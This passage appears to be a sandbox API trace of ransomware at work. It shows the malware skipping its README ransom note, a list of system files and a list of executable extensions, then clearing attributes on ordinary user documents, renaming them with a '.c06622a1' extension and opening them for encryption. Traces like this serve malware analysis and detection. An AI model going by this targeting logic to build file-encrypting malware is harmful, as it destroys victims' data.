dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0149.186] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.186] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.187] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e7fe010, ftCreationTime.dwHighDateTime=0x1d5e492, ftLastAccessTime.dwLowDateTime=0x74d95c0, ftLastAccessTime.dwHighDateTime=0x1d5dcc9, ftLastWriteTime.dwLowDateTime=0x74d95c0, ftLastWriteTime.dwHighDateTime=0x1d5dcc9, nFileSizeHigh=0x0, nFileSizeLow=0x7eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2-vtMSS13nYUa2.pdf", cAlternateFileName="2-VTMS~1.PDF")) returned 1 [0149.187] _wcsicmp (_Str1="2-vtMSS13nYUa2.pdf", _Str2="README.c06622a1.TXT") returned -64 [0149.187] wcsstr (_Str="2-vtMSS13nYUa2.pdf", _SubStr="README") returned 0x0 [0149.187] _wcsicmp (_Str1="autorun.inf", _Str2="2-vtMSS13nYUa2.pdf") returned 47 [0149.187] wcslen (_String="autorun.inf") returned 0xb [0149.187] _wcsicmp (_Str1="boot.ini", _Str2="2-vtMSS13nYUa2.pdf") returned 48 [0149.187] wcslen (_String="boot.ini") returned 0x8 [0149.187] _wcsicmp (_Str1="bootfont.bin", _Str2="2-vtMSS13nYUa2.pdf") returned 48 [0149.187] wcslen (_String="bootfont.bin") returned 0xc [0149.187] _wcsicmp (_Str1="bootsect.bak", _Str2="2-vtMSS13nYUa2.pdf") returned 48 [0149.187] wcslen (_String="bootsect.bak") returned 0xc [0149.187] _wcsicmp (_Str1="desktop.ini", _Str2="2-vtMSS13nYUa2.pdf") returned 50 [0149.187] wcslen (_String="desktop.ini") returned 0xb [0149.187] _wcsicmp (_Str1="iconcache.db", _Str2="2-vtMSS13nYUa2.pdf") returned 55 [0149.187] wcslen (_String="iconcache.db") returned 0xc [0149.187] _wcsicmp (_Str1="ntldr", _Str2="2-vtMSS13nYUa2.pdf") returned 60 [0149.187] wcslen (_String="ntldr") returned 0x5 [0149.187] _wcsicmp (_Str1="ntuser.dat", _Str2="2-vtMSS13nYUa2.pdf") returned 60 [0149.187] wcslen (_String="ntuser.dat") returned 0xa [0149.187] _wcsicmp (_Str1="ntuser.dat.log", _Str2="2-vtMSS13nYUa2.pdf") returned 60 [0149.187] wcslen (_String="ntuser.dat.log") returned 0xe [0149.187] _wcsicmp (_Str1="ntuser.ini", _Str2="2-vtMSS13nYUa2.pdf") returned 60 [0149.187] wcslen (_String="ntuser.ini") returned 0xa [0149.187] _wcsicmp (_Str1="thumbs.db", _Str2="2-vtMSS13nYUa2.pdf") returned 66 [0149.187] wcslen (_String="thumbs.db") returned 0x9 [0149.187] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0149.187] wcslen (_String="386") returned 0x3 [0149.187] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0149.187] wcslen (_String="adv") returned 0x3 [0149.187] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0149.187] wcslen (_String="ani") returned 0x3 [0149.187] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0149.187] wcslen (_String="bat") returned 0x3 [0149.187] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0149.188] wcslen (_String="bin") returned 0x3 [0149.188] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0149.188] wcslen (_String="cab") returned 0x3 [0149.188] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0149.188] wcslen (_String="cmd") returned 0x3 [0149.188] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0149.188] wcslen (_String="com") returned 0x3 [0149.188] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0149.188] wcslen (_String="cpl") returned 0x3 [0149.188] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0149.188] wcslen (_String="cur") returned 0x3 [0149.188] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0149.188] wcslen (_String="deskthemepack") returned 0xd [0149.188] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0149.188] wcslen (_String="diagcab") returned 0x7 [0149.188] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0149.188] wcslen (_String="diagcfg") returned 0x7 [0149.188] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0149.188] wcslen (_String="diagpkg") returned 0x7 [0149.188] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0149.188] wcslen (_String="dll") returned 0x3 [0149.188] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0149.188] wcslen (_String="drv") returned 0x3 [0149.188] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0149.188] wcslen (_String="exe") returned 0x3 [0149.188] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0149.188] wcslen (_String="hlp") returned 0x3 [0149.188] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0149.188] wcslen (_String="icl") returned 0x3 [0149.188] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0149.188] wcslen (_String="icns") returned 0x4 [0149.188] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0149.188] wcslen (_String="ico") returned 0x3 [0149.188] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0149.188] wcslen (_String="ics") returned 0x3 [0149.188] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0149.188] wcslen (_String="idx") returned 0x3 [0149.188] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0149.189] wcslen (_String="ldf") returned 0x3 [0149.189] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0149.189] wcslen (_String="lnk") returned 0x3 [0149.189] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0149.189] wcslen (_String="mod") returned 0x3 [0149.189] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0149.189] wcslen (_String="mpa") returned 0x3 [0149.189] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0149.189] wcslen (_String="msc") returned 0x3 [0149.189] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0149.189] wcslen (_String="msp") returned 0x3 [0149.189] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0149.189] wcslen (_String="msstyles") returned 0x8 [0149.189] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0149.189] wcslen (_String="msu") returned 0x3 [0149.189] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0149.189] wcslen (_String="nls") returned 0x3 [0149.189] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0149.189] wcslen (_String="nomedia") returned 0x7 [0149.189] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0149.189] wcslen (_String="ocx") returned 0x3 [0149.189] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0149.189] wcslen (_String="prf") returned 0x3 [0149.189] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0149.189] wcslen (_String="ps1") returned 0x3 [0149.189] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0149.189] wcslen (_String="rom") returned 0x3 [0149.189] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0149.189] wcslen (_String="rtp") returned 0x3 [0149.189] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0149.189] wcslen (_String="scr") returned 0x3 [0149.189] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0149.189] wcslen (_String="shs") returned 0x3 [0149.189] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0149.189] wcslen (_String="spl") returned 0x3 [0149.189] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0149.189] wcslen (_String="sys") returned 0x3 [0149.189] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0149.190] wcslen (_String="theme") returned 0x5 [0149.190] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0149.190] wcslen (_String="themepack") returned 0x9 [0149.190] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0149.190] wcslen (_String="wpx") returned 0x3 [0149.190] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0149.190] wcslen (_String="lock") returned 0x4 [0149.190] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0149.190] wcslen (_String="key") returned 0x3 [0149.190] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0149.190] wcslen (_String="hta") returned 0x3 [0149.190] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0149.190] wcslen (_String="msi") returned 0x3 [0149.190] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0149.190] wcslen (_String="pdb") returned 0x3 [0149.190] _wcsicmp (_Str1="sql", _Str2="pdf") returned 3 [0149.190] wcslen (_String="sql") returned 0x3 [0149.190] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0149.190] wcslen (_String="sqlite") returned 0x6 [0149.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.190] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.190] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.190] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.190] wcscpy (in: _Dest=0x453011e, _Source="2-vtMSS13nYUa2.pdf" | out: _Dest="2-vtMSS13nYUa2.pdf") returned="2-vtMSS13nYUa2.pdf" [0149.190] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf", dwFileAttributes=0x80) returned 1 [0149.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\2-vtmss13nyua2.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0149.191] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.191] ReadFile (in: hFile=0x13c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.192] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x7310eb64 [0149.192] RtlComputeCrc32 (PartialCrc=0xeb64, Buffer=0x3fe674, Length=0x80) returned 0x8a65be7e [0149.192] RtlComputeCrc32 (PartialCrc=0xbe7e, Buffer=0x3fe674, Length=0x80) returned 0x2c154ce3 [0149.192] RtlComputeCrc32 (PartialCrc=0x4ce3, Buffer=0x3fe674, Length=0x80) returned 0xbe4938ca [0149.192] RtlComputeCrc32 (PartialCrc=0x38ca, Buffer=0x3fe674, Length=0x80) returned 0x192be1b6 [0149.192] CloseHandle (hObject=0x13c) returned 1 [0149.192] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.192] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf" [0149.192] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf") returned 0x4d [0149.192] wcscpy (in: _Dest=0x454014a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.192] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\2-vtmss13nyua2.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\2-vtmss13nyua2.pdf.c06622a1"), dwFlags=0x8) returned 1 [0149.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\2-vtMSS13nYUa2.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\2-vtmss13nyua2.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x13c [0149.194] CreateIoCompletionPort (FileHandle=0x13c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.194] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7110089a [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e393a43 [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e8b9272 [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x354ec0b6 [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59a69b7 [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x38470dba [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfef30a6 [0149.199] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36014df1 [0149.202] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xe7b5cebb [0149.202] RtlComputeCrc32 (PartialCrc=0xcebb, Buffer=0x4670094, Length=0x80) returned 0xf37b3f76 [0149.202] RtlComputeCrc32 (PartialCrc=0x3f76, Buffer=0x4670094, Length=0x80) returned 0x8fbdbc1f [0149.202] RtlComputeCrc32 (PartialCrc=0xbc1f, Buffer=0x4670094, Length=0x80) returned 0xcd38b884 [0149.203] RtlComputeCrc32 (PartialCrc=0xb884, Buffer=0x4670094, Length=0x80) returned 0x504fb042 [0149.203] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0149.203] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.203] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.203] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b9b5d0, ftCreationTime.dwHighDateTime=0x1d5db2b, ftLastAccessTime.dwLowDateTime=0x639ed60, ftLastAccessTime.dwHighDateTime=0x1d5e3d0, ftLastWriteTime.dwLowDateTime=0x639ed60, ftLastWriteTime.dwHighDateTime=0x1d5e3d0, nFileSizeHigh=0x0, nFileSizeLow=0x14f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="3jI XWvoc.odt", cAlternateFileName="3JIXWV~1.ODT")) returned 1 [0149.203] _wcsicmp (_Str1="3jI XWvoc.odt", _Str2="README.c06622a1.TXT") returned -63 [0149.203] wcsstr (_Str="3jI XWvoc.odt", _SubStr="README") returned 0x0 [0149.203] _wcsicmp (_Str1="autorun.inf", _Str2="3jI XWvoc.odt") returned 46 [0149.203] wcslen (_String="autorun.inf") returned 0xb [0149.203] _wcsicmp (_Str1="boot.ini", _Str2="3jI XWvoc.odt") returned 47 [0149.203] wcslen (_String="boot.ini") returned 0x8 [0149.203] _wcsicmp (_Str1="bootfont.bin", _Str2="3jI XWvoc.odt") returned 47 [0149.203] wcslen (_String="bootfont.bin") returned 0xc [0149.203] _wcsicmp (_Str1="bootsect.bak", _Str2="3jI XWvoc.odt") returned 47 [0149.203] wcslen (_String="bootsect.bak") returned 0xc [0149.203] _wcsicmp (_Str1="desktop.ini", _Str2="3jI XWvoc.odt") returned 49 [0149.203] wcslen (_String="desktop.ini") returned 0xb [0149.203] _wcsicmp (_Str1="iconcache.db", _Str2="3jI XWvoc.odt") returned 54 [0149.203] wcslen (_String="iconcache.db") returned 0xc [0149.203] _wcsicmp (_Str1="ntldr", _Str2="3jI XWvoc.odt") returned 59 [0149.203] wcslen (_String="ntldr") returned 0x5 [0149.203] _wcsicmp (_Str1="ntuser.dat", _Str2="3jI XWvoc.odt") returned 59 [0149.203] wcslen (_String="ntuser.dat") returned 0xa [0149.203] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3jI XWvoc.odt") returned 59 [0149.203] wcslen (_String="ntuser.dat.log") returned 0xe [0149.203] _wcsicmp (_Str1="ntuser.ini", _Str2="3jI XWvoc.odt") returned 59 [0149.203] wcslen (_String="ntuser.ini") returned 0xa [0149.203] _wcsicmp (_Str1="thumbs.db", _Str2="3jI XWvoc.odt") returned 65 [0149.203] wcslen (_String="thumbs.db") returned 0x9 [0149.203] _wcsicmp (_Str1="386", _Str2="odt") returned -60 [0149.203] wcslen (_String="386") returned 0x3 [0149.203] _wcsicmp (_Str1="adv", _Str2="odt") returned -14 [0149.203] wcslen (_String="adv") returned 0x3 [0149.203] _wcsicmp (_Str1="ani", _Str2="odt") returned -14 [0149.204] wcslen (_String="ani") returned 0x3 [0149.204] _wcsicmp (_Str1="bat", _Str2="odt") returned -13 [0149.204] wcslen (_String="bat") returned 0x3 [0149.204] _wcsicmp (_Str1="bin", _Str2="odt") returned -13 [0149.204] wcslen (_String="bin") returned 0x3 [0149.204] _wcsicmp (_Str1="cab", _Str2="odt") returned -12 [0149.204] wcslen (_String="cab") returned 0x3 [0149.204] _wcsicmp (_Str1="cmd", _Str2="odt") returned -12 [0149.204] wcslen (_String="cmd") returned 0x3 [0149.204] _wcsicmp (_Str1="com", _Str2="odt") returned -12 [0149.204] wcslen (_String="com") returned 0x3 [0149.204] _wcsicmp (_Str1="cpl", _Str2="odt") returned -12 [0149.204] wcslen (_String="cpl") returned 0x3 [0149.204] _wcsicmp (_Str1="cur", _Str2="odt") returned -12 [0149.204] wcslen (_String="cur") returned 0x3 [0149.204] _wcsicmp (_Str1="deskthemepack", _Str2="odt") returned -11 [0149.204] wcslen (_String="deskthemepack") returned 0xd [0149.204] _wcsicmp (_Str1="diagcab", _Str2="odt") returned -11 [0149.204] wcslen (_String="diagcab") returned 0x7 [0149.204] _wcsicmp (_Str1="diagcfg", _Str2="odt") returned -11 [0149.204] wcslen (_String="diagcfg") returned 0x7 [0149.204] _wcsicmp (_Str1="diagpkg", _Str2="odt") returned -11 [0149.204] wcslen (_String="diagpkg") returned 0x7 [0149.204] _wcsicmp (_Str1="dll", _Str2="odt") returned -11 [0149.204] wcslen (_String="dll") returned 0x3 [0149.204] _wcsicmp (_Str1="drv", _Str2="odt") returned -11 [0149.204] wcslen (_String="drv") returned 0x3 [0149.204] _wcsicmp (_Str1="exe", _Str2="odt") returned -10 [0149.204] wcslen (_String="exe") returned 0x3 [0149.204] _wcsicmp (_Str1="hlp", _Str2="odt") returned -7 [0149.204] wcslen (_String="hlp") returned 0x3 [0149.204] _wcsicmp (_Str1="icl", _Str2="odt") returned -6 [0149.204] wcslen (_String="icl") returned 0x3 [0149.204] _wcsicmp (_Str1="icns", _Str2="odt") returned -6 [0149.204] wcslen (_String="icns") returned 0x4 [0149.204] _wcsicmp (_Str1="ico", _Str2="odt") returned -6 [0149.204] wcslen (_String="ico") returned 0x3 [0149.204] _wcsicmp (_Str1="ics", _Str2="odt") returned -6 [0149.205] wcslen (_String="ics") returned 0x3 [0149.205] _wcsicmp (_Str1="idx", _Str2="odt") returned -6 [0149.205] wcslen (_String="idx") returned 0x3 [0149.205] _wcsicmp (_Str1="ldf", _Str2="odt") returned -3 [0149.205] wcslen (_String="ldf") returned 0x3 [0149.205] _wcsicmp (_Str1="lnk", _Str2="odt") returned -3 [0149.205] wcslen (_String="lnk") returned 0x3 [0149.205] _wcsicmp (_Str1="mod", _Str2="odt") returned -2 [0149.205] wcslen (_String="mod") returned 0x3 [0149.205] _wcsicmp (_Str1="mpa", _Str2="odt") returned -2 [0149.205] wcslen (_String="mpa") returned 0x3 [0149.205] _wcsicmp (_Str1="msc", _Str2="odt") returned -2 [0149.205] wcslen (_String="msc") returned 0x3 [0149.205] _wcsicmp (_Str1="msp", _Str2="odt") returned -2 [0149.205] wcslen (_String="msp") returned 0x3 [0149.205] _wcsicmp (_Str1="msstyles", _Str2="odt") returned -2 [0149.205] wcslen (_String="msstyles") returned 0x8 [0149.205] _wcsicmp (_Str1="msu", _Str2="odt") returned -2 [0149.205] wcslen (_String="msu") returned 0x3 [0149.205] _wcsicmp (_Str1="nls", _Str2="odt") returned -1 [0149.205] wcslen (_String="nls") returned 0x3 [0149.205] _wcsicmp (_Str1="nomedia", _Str2="odt") returned -1 [0149.205] wcslen (_String="nomedia") returned 0x7 [0149.205] _wcsicmp (_Str1="ocx", _Str2="odt") returned -1 [0149.205] wcslen (_String="ocx") returned 0x3 [0149.205] _wcsicmp (_Str1="prf", _Str2="odt") returned 1 [0149.205] wcslen (_String="prf") returned 0x3 [0149.205] _wcsicmp (_Str1="ps1", _Str2="odt") returned 1 [0149.205] wcslen (_String="ps1") returned 0x3 [0149.205] _wcsicmp (_Str1="rom", _Str2="odt") returned 3 [0149.205] wcslen (_String="rom") returned 0x3 [0149.205] _wcsicmp (_Str1="rtp", _Str2="odt") returned 3 [0149.205] wcslen (_String="rtp") returned 0x3 [0149.205] _wcsicmp (_Str1="scr", _Str2="odt") returned 4 [0149.205] wcslen (_String="scr") returned 0x3 [0149.205] _wcsicmp (_Str1="shs", _Str2="odt") returned 4 [0149.205] wcslen (_String="shs") returned 0x3 [0149.205] _wcsicmp (_Str1="spl", _Str2="odt") returned 4 [0149.206] wcslen (_String="spl") returned 0x3 [0149.206] _wcsicmp (_Str1="sys", _Str2="odt") returned 4 [0149.206] wcslen (_String="sys") returned 0x3 [0149.206] _wcsicmp (_Str1="theme", _Str2="odt") returned 5 [0149.206] wcslen (_String="theme") returned 0x5 [0149.206] _wcsicmp (_Str1="themepack", _Str2="odt") returned 5 [0149.206] wcslen (_String="themepack") returned 0x9 [0149.206] _wcsicmp (_Str1="wpx", _Str2="odt") returned 8 [0149.206] wcslen (_String="wpx") returned 0x3 [0149.206] _wcsicmp (_Str1="lock", _Str2="odt") returned -3 [0149.206] wcslen (_String="lock") returned 0x4 [0149.206] _wcsicmp (_Str1="key", _Str2="odt") returned -4 [0149.206] wcslen (_String="key") returned 0x3 [0149.206] _wcsicmp (_Str1="hta", _Str2="odt") returned -7 [0149.206] wcslen (_String="hta") returned 0x3 [0149.206] _wcsicmp (_Str1="msi", _Str2="odt") returned -2 [0149.206] wcslen (_String="msi") returned 0x3 [0149.206] _wcsicmp (_Str1="pdb", _Str2="odt") returned 1 [0149.206] wcslen (_String="pdb") returned 0x3 [0149.206] _wcsicmp (_Str1="sql", _Str2="odt") returned 4 [0149.206] wcslen (_String="sql") returned 0x3 [0149.206] _wcsicmp (_Str1="sqlite", _Str2="odt") returned 4 [0149.206] wcslen (_String="sqlite") returned 0x6 [0149.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.206] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.206] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.206] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.206] wcscpy (in: _Dest=0x453011e, _Source="3jI XWvoc.odt" | out: _Dest="3jI XWvoc.odt") returned="3jI XWvoc.odt" [0149.206] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt", dwFileAttributes=0x80) returned 1 [0149.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\3ji xwvoc.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.207] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.207] ReadFile (in: hFile=0x1a8, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.208] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xa3e89480 [0149.208] RtlComputeCrc32 (PartialCrc=0x9480, Buffer=0x3fe674, Length=0x80) returned 0x63ca9b2a [0149.208] RtlComputeCrc32 (PartialCrc=0x9b2a, Buffer=0x3fe674, Length=0x80) returned 0x3e01230d [0149.208] RtlComputeCrc32 (PartialCrc=0x230d, Buffer=0x3fe674, Length=0x80) returned 0x74b82a78 [0149.208] RtlComputeCrc32 (PartialCrc=0x2a78, Buffer=0x3fe674, Length=0x80) returned 0xb9166a63 [0149.208] CloseHandle (hObject=0x1a8) returned 1 [0149.208] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.208] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt" [0149.208] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt") returned 0x48 [0149.208] wcscpy (in: _Dest=0x4540140, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.208] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\3ji xwvoc.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\3ji xwvoc.odt.c06622a1"), dwFlags=0x8) returned 1 [0149.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 